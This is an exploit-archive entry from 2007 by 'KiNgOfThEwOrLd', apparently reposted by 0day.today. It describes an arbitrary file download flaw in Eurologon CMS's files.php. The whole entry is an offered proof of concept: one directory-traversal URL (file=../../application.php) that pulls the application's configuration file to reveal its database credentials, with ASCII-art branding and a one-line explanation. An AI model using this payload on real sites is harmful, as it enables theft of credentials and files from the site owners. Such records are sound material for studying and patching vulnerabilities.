id: 2319
date: 11/27/2007
title: Eurologon CMS files.php Arbitrary File Download Vulnerability
author: KiNgOfThEwOrLd
cves: 

=============================================================
Eurologon CMS files.php Arbitrary File Download Vulnerability
=============================================================




---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         

---------------------------------------------------------------

Eurologon CMS Db credentials disclosure / files download

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

The download module, not correctly check the file parameter, then using 
directory traversal we can get all the files hosted in our target web space.
---------------------------------------------------------------
Get Database Credentials

http://[target]/users/files.php?mode=download&file=../../application.php
---------------------------------------------------------------



#  0day.today [2023-03-22]  #